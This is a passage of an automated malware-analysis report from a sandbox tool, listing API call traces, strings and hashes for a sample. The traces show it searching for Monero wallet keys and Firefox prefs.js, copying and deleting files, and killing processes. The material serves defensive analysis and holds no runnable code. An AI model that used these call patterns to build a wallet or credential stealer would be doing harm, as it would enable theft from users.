                                • FindClose.KERNEL32(000000FF), ref: 00EB4DE2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextwsprintf
                                • String ID: %s\%s$%s\%s$%s\*
                                • API String ID: 180737720-445461498
                                • Opcode ID: 396791304653753620bdb630f81535ecb54182a4c48e7fb42a5fa46e80060fef
                                • Instruction ID: 9484390597061e852ddecc4954f7d9f96f79ee9791cf674bb6dfac755af47fd4
                                • Opcode Fuzzy Hash: 396791304653753620bdb630f81535ecb54182a4c48e7fb42a5fa46e80060fef
                                • Instruction Fuzzy Hash: B7614CB5900218ABCB34EBA0DD49FEA737CBB48700F00459CF619A6185EB71ABC5CF91
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00EB47D0
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00EB47D7
                                • wsprintfA.USER32 ref: 00EB47F6
                                • FindFirstFileA.KERNEL32(?,?), ref: 00EB480D
                                • StrCmpCA.SHLWAPI(?,00EC0FAC), ref: 00EB483B
                                • StrCmpCA.SHLWAPI(?,00EC0FB0), ref: 00EB4851
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00EB48DB
                                • FindClose.KERNEL32(000000FF), ref: 00EB48F0
                                • lstrcat.KERNEL32(?,01BFF750), ref: 00EB4915
                                • lstrcat.KERNEL32(?,01BFE7E0), ref: 00EB4928
                                • lstrlen.KERNEL32(?), ref: 00EB4935
                                • lstrlen.KERNEL32(?), ref: 00EB4946
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                • String ID: %s\%s$%s\*
                                • API String ID: 671575355-2848263008
                                • Opcode ID: 7df191f926746b5ec4473447dfb16584a11bfa7768df29c22f8528dd4b46c3d2
                                • Instruction ID: f21d8ef353d1b4a2de32ef54374d960c3c4ed5295295f01a0acce22c2686f824
                                • Opcode Fuzzy Hash: 7df191f926746b5ec4473447dfb16584a11bfa7768df29c22f8528dd4b46c3d2
                                • Instruction Fuzzy Hash: 8A5166B59402189BCB28EF70DC89FEE77BCAB58300F405598F619A6185EB709BC4CF91
                                APIs
                                • wsprintfA.USER32 ref: 00EB4113
                                • FindFirstFileA.KERNEL32(?,?), ref: 00EB412A
                                • StrCmpCA.SHLWAPI(?,00EC0F94), ref: 00EB4158
                                • StrCmpCA.SHLWAPI(?,00EC0F98), ref: 00EB416E
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00EB42BC
                                • FindClose.KERNEL32(000000FF), ref: 00EB42D1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextwsprintf
                                • String ID: %s\%s
                                • API String ID: 180737720-4073750446
                                • Opcode ID: dc6c63843ef5ad3942409c54b56d8fd34c7c967b029e1abf0462063974409362
                                • Instruction ID: 380fef3419cefa44506e7b82c52f0ff24a418306faf867908f6e12565580a1b2
                                • Opcode Fuzzy Hash: dc6c63843ef5ad3942409c54b56d8fd34c7c967b029e1abf0462063974409362
                                • Instruction Fuzzy Hash: 8B514AB5900218ABCB28EBB0DD85EEA737CBB58300F4045DCF659A6185DB759BC5CF90
                                APIs
                                • wsprintfA.USER32 ref: 00EAEE3E
                                • FindFirstFileA.KERNEL32(?,?), ref: 00EAEE55
                                • StrCmpCA.SHLWAPI(?,00EC1630), ref: 00EAEEAB
                                • StrCmpCA.SHLWAPI(?,00EC1634), ref: 00EAEEC1
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00EAF3AE
                                • FindClose.KERNEL32(000000FF), ref: 00EAF3C3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextwsprintf
                                • String ID: %s\*.*
                                • API String ID: 180737720-1013718255
                                • Opcode ID: aa91abf6558b61808e2ef3d409efcfea2e50640429257ec3b23d4c6906a96974
                                • Instruction ID: 35b0ddc3ef786934ccabd5f5ae393cc6338230bbe6d1068f58c6d8c13537ab3e
                                • Opcode Fuzzy Hash: aa91abf6558b61808e2ef3d409efcfea2e50640429257ec3b23d4c6906a96974
                                • Instruction Fuzzy Hash: D8E11072911218AADF54FB60CDA2EEF73B9AF54300F4455F9B41A72092EE306B89CF51
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 2-by$2-by$2-byexpa$expa$expa$expand 3$expand 32-by$nd 3$nd 32-by$te k$te k$te k$te knd 3expand 32-by
                                • API String ID: 0-1562099544
                                • Opcode ID: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                • Instruction ID: 3dadc6e66ba112c1c793950841c7e168b6a1de68d752997a4921594d83fa2a76
                                • Opcode Fuzzy Hash: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                • Instruction Fuzzy Hash: 9DE276B09083808FD7A4CF29C580B8BFBE1BFC8354F51892EE99997211D770A959CF56
                                APIs
                                  • Part of subcall function 00EBAA50: lstrcpy.KERNEL32(00EC0E1A,00000000), ref: 00EBAA98
                                  • Part of subcall function 00EBAC30: lstrcpy.KERNEL32(00000000,?), ref: 00EBAC82
                                  • Part of subcall function 00EBAC30: lstrcat.KERNEL32(00000000), ref: 00EBAC92
                                  • Part of subcall function 00EBACC0: lstrlen.KERNEL32(?,01BF9FE8,?,\Monero\wallet.keys,00EC0E1A), ref: 00EBACD5
                                  • Part of subcall function 00EBACC0: lstrcpy.KERNEL32(00000000), ref: 00EBAD14
                                  • Part of subcall function 00EBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00EBAD22
                                  • Part of subcall function 00EBABB0: lstrcpy.KERNEL32(?,00EC0E1A), ref: 00EBAC15
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00EC16B0,00EC0D97), ref: 00EAF81E
                                • StrCmpCA.SHLWAPI(?,00EC16B4), ref: 00EAF86F
                                • StrCmpCA.SHLWAPI(?,00EC16B8), ref: 00EAF885
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00EAFBB1
                                • FindClose.KERNEL32(000000FF), ref: 00EAFBC3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                 • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID: prefs.js
                                • API String ID: 3334442632-3783873740
                                • Opcode ID: 6ddcbefb0910224f164865b77cfcd86cb7c37ae87222be14bf75b01a86d745ad
                                • Instruction ID: 2ed65c430ea24b8e0b4a08b605c98af63804597989f6a44694ba1b457824439c
                                • Opcode Fuzzy Hash: 6ddcbefb0910224f164865b77cfcd86cb7c37ae87222be14bf75b01a86d745ad
                                • Instruction Fuzzy Hash: 0EB12171910118ABCF24FB60DD96FEE73B9AF55300F4455B8E41A7A181EF30AB48CB92
                                APIs
                                  • Part of subcall function 00EBAA50: lstrcpy.KERNEL32(00EC0E1A,00000000), ref: 00EBAA98
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00EC523C,?,?,?,00EC52E4,?,?,00000000,?,00000000), ref: 00EA1963
                                • StrCmpCA.SHLWAPI(?,00EC538C), ref: 00EA19B3
                                • StrCmpCA.SHLWAPI(?,00EC5434), ref: 00EA19C9
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00EA1D80
                                • DeleteFileA.KERNEL32(00000000), ref: 00EA1E0A
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00EA1E60
                                • FindClose.KERNEL32(000000FF), ref: 00EA1E72
                                  • Part of subcall function 00EBAC30: lstrcpy.KERNEL32(00000000,?), ref: 00EBAC82
                                  • Part of subcall function 00EBAC30: lstrcat.KERNEL32(00000000), ref: 00EBAC92
                                  • Part of subcall function 00EBACC0: lstrlen.KERNEL32(?,01BF9FE8,?,\Monero\wallet.keys,00EC0E1A), ref: 00EBACD5
                                  • Part of subcall function 00EBACC0: lstrcpy.KERNEL32(00000000), ref: 00EBAD14
                                  • Part of subcall function 00EBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00EBAD22
                                  • Part of subcall function 00EBABB0: lstrcpy.KERNEL32(?,00EC0E1A), ref: 00EBAC15
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                 • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                • String ID: \*.*
                                • API String ID: 1415058207-1173974218
                                • Opcode ID: bd89d7ebcb4d205d5a87c6938f1dc49ac1269e8e5822f758704e04baaa18afc9
                                • Instruction ID: c119a093f81ac5130c8913f1e4cfa8202df15531884b5033098a02cf5944f792
                                • Opcode Fuzzy Hash: bd89d7ebcb4d205d5a87c6938f1dc49ac1269e8e5822f758704e04baaa18afc9
                                • Instruction Fuzzy Hash: 9112EC71910118ABCF19EB60CDA6EEFB3B9AF54300F4455F9A11A76091EF306B89CF61
                                APIs
                                  • Part of subcall function 00EBAA50: lstrcpy.KERNEL32(00EC0E1A,00000000), ref: 00EBAA98
                                  • Part of subcall function 00EBACC0: lstrlen.KERNEL32(?,01BF9FE8,?,\Monero\wallet.keys,00EC0E1A), ref: 00EBACD5
                                  • Part of subcall function 00EBACC0: lstrcpy.KERNEL32(00000000), ref: 00EBAD14
                                  • Part of subcall function 00EBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00EBAD22
                                  • Part of subcall function 00EBABB0: lstrcpy.KERNEL32(?,00EC0E1A), ref: 00EBAC15
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00EC0C32), ref: 00EADF5E
                                • StrCmpCA.SHLWAPI(?,00EC15C0), ref: 00EADFAE
                                • StrCmpCA.SHLWAPI(?,00EC15C4), ref: 00EADFC4
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00EAE4E0
                                • FindClose.KERNEL32(000000FF), ref: 00EAE4F2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                 • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                • String ID: \*.*
                                • API String ID: 2325840235-1173974218
                                • Opcode ID: 2b191945c6d4c701be5a7126856ca8ab7e11dcb7b0b11498793dbed54adfb515
                                • Instruction ID: bb13f00b105a7b5bc6e29084cfc3cef74043aa9433de5b11e75561081d8c32b1
                                • Opcode Fuzzy Hash: 2b191945c6d4c701be5a7126856ca8ab7e11dcb7b0b11498793dbed54adfb515
                                • Instruction Fuzzy Hash: 32F1BF71924118AACF15FB60DDA6EEFB3B9AF14300F4465F9A01A72191EF306B89CF51
                                APIs
                                  • Part of subcall function 00EBAA50: lstrcpy.KERNEL32(00EC0E1A,00000000), ref: 00EBAA98
                                  • Part of subcall function 00EBAC30: lstrcpy.KERNEL32(00000000,?), ref: 00EBAC82
                                  • Part of subcall function 00EBAC30: lstrcat.KERNEL32(00000000), ref: 00EBAC92
                                  • Part of subcall function 00EBACC0: lstrlen.KERNEL32(?,01BF9FE8,?,\Monero\wallet.keys,00EC0E1A), ref: 00EBACD5
                                  • Part of subcall function 00EBACC0: lstrcpy.KERNEL32(00000000), ref: 00EBAD14
                                  • Part of subcall function 00EBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00EBAD22
                                  • Part of subcall function 00EBABB0: lstrcpy.KERNEL32(?,00EC0E1A), ref: 00EBAC15
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00EC15A8,00EC0BAF), ref: 00EADBEB
                                • StrCmpCA.SHLWAPI(?,00EC15AC), ref: 00EADC33
                                • StrCmpCA.SHLWAPI(?,00EC15B0), ref: 00EADC49
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00EADECC
                                • FindClose.KERNEL32(000000FF), ref: 00EADEDE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                 • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID:
                                • API String ID: 3334442632-0
                                • Opcode ID: 049e945d78d13d62d7a3f69b48d23957813a1c3c541240cffb49898de68ddc12
                                • Instruction ID: 73cd2224e0f773799e2a8a39d3fecd64dfc9eccd2bdd9db2da2c22a247c4dae9
                                • Opcode Fuzzy Hash: 049e945d78d13d62d7a3f69b48d23957813a1c3c541240cffb49898de68ddc12
                                • Instruction Fuzzy Hash: 7D913672A00104ABCF14FB70DD969EE73BD9B89340F4455B8F8177A185EE34AB48CB92
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00EB9905
                                • Process32First.KERNEL32(00EA9FDE,00000128), ref: 00EB9919
                                • Process32Next.KERNEL32(00EA9FDE,00000128), ref: 00EB992E
                                • StrCmpCA.SHLWAPI(?,00EA9FDE), ref: 00EB9943
                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00EB995C
                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 00EB997A
                                • CloseHandle.KERNEL32(00000000), ref: 00EB9987
                                • CloseHandle.KERNEL32(00EA9FDE), ref: 00EB9993
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                 • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                • String ID:
                                • API String ID: 2696918072-0
                                • Opcode ID: ca2c4f4024272236877ec3246f46760212ab110abb9cb249a285a82572abe755
                                • Instruction ID: 74c676802ed7c0baac97a3fffd5809275e32a937dd02f259f598b32ea394ecef
                                • Opcode Fuzzy Hash: ca2c4f4024272236877ec3246f46760212ab110abb9cb249a285a82572abe755
                                • Instruction Fuzzy Hash: B1112175900208ABDB64DFA0DC8CBDEB779BB88700F10459CF615A6284D7749B84CF90
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                 • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: \]$!mu$$VE?$7N{_$Rc};$Rt'v$[:ww$hjz9
                                • API String ID: 0-2401617613
                                • Opcode ID: d1bd3b330b5e1a1de3bc4aa695df6dcab746777db785cc33fe180342ea21111c
                                • Instruction ID: 31bd0fbd36ced458b11c3ad2ea7d652fc243d0acab6b9d708c724ac365500393
                                • Opcode Fuzzy Hash: d1bd3b330b5e1a1de3bc4aa695df6dcab746777db785cc33fe180342ea21111c
                                • Instruction Fuzzy Hash: 91B207F36082049FE304AE2DEC8577ABBE9EF94720F1A493DE6C4C7744EA7558018796
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                 • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: /"|$63A}$Aoa$K:Z;$NjM$NjM$Rz}$Z7g
                                • API String ID: 0-1292933336
                                • Opcode ID: 4e8b29e1a60500a0fd7fc5e1a693e580de2e39bb4adf61b130adf5cfe2f4b045
                                • Instruction ID: 824fb0960c3f5e837952f7113e61c303f48258f7aeb7a0cd68e7d3982aee80dd
                                • Opcode Fuzzy Hash: 4e8b29e1a60500a0fd7fc5e1a693e580de2e39bb4adf61b130adf5cfe2f4b045
